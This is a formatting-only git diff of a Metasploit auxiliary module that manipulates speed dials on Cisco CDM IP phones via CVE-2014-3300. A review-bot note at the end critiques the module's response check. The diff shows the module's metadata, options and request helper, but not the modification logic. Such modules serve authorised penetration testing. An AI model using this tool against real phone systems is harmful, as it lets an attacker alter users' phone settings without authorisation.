Minor beautification
parent
1d0e9a2dca
commit
000d7dd1eb
|
@ -10,44 +10,35 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info={})
|
||||||
super(
|
super(update_info(info,
|
||||||
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
|
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
|
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
|
||||||
in Unified CDM Application Software before 10 does not properly implement access control,
|
in Unified CDM Application Software before 10 does not properly implement access control,
|
||||||
which allows remote attackers to modify user information. This vulnerability can be exploited
|
which allows remote attackers to modify user information. This vulnerability can be exploited
|
||||||
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
|
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
|
||||||
voss-xmlservice component of Viproy.
|
voss-xmlservice component of Viproy.
|
||||||
},
|
},
|
||||||
'Author' => 'fozavci',
|
'Author' => 'fozavci',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2014-3300'],
|
['CVE', '2014-3300'],
|
||||||
['BID', '68331']
|
['BID', '68331']
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' =>
|
||||||
[
|
[
|
||||||
[ 'List', {
|
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
|
||||||
'Description' => 'Getting the speeddials for the MAC address.'
|
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
|
||||||
} ],
|
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
|
||||||
[ 'Modify', {
|
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
|
||||||
'Description' => 'Modifying a speeddial for the MAC address.'
|
],
|
||||||
} ],
|
|
||||||
[ 'Add', {
|
|
||||||
'Description' => 'Adding a speeddial for the MAC address.'
|
|
||||||
} ],
|
|
||||||
[ 'Delete', {
|
|
||||||
'Description' => 'Deleting a speeddial for the MAC address.'
|
|
||||||
} ]
|
|
||||||
],
|
|
||||||
'DefaultAction' => 'List'
|
'DefaultAction' => 'List'
|
||||||
)
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80),
|
|
||||||
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
|
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
|
||||||
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
|
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
|
||||||
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
|
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
|
||||||
|
@ -122,10 +113,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
def send_rcv(uri)
|
def send_rcv(uri)
|
||||||
uri=normalize_uri(uri.to_s)
|
uri=normalize_uri(uri.to_s)
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
|
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
|
||||||
return Exploit::CheckCode::Vulnerable,res
|
return Exploit::CheckCode::Vulnerable,res
|
||||||
else
|
else
|
||||||
|
|
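Review bot: The response check in `send_rcv` uses `/Speed [D|d]ial/`, where the `|` inside the character class is a literal character, so the pattern also accepts `Speed |ial`; `/Speed [Dd]ial/` says what is meant. The same condition returns `Exploit::CheckCode::Vulnerable` for any 200 response whose body contains that phrase, so an unrelated page that mentions speed dials would be reported as vulnerable. A tighter match on the expected XML response, or a weaker code such as `Exploit::CheckCode::Detected`, would make the result more trustworthy for anyone triaging scan output. The `and` operators in that condition would conventionally be `&&`. `send_rcv` continues past the end of the hunk, so the `else` branch is not visible here.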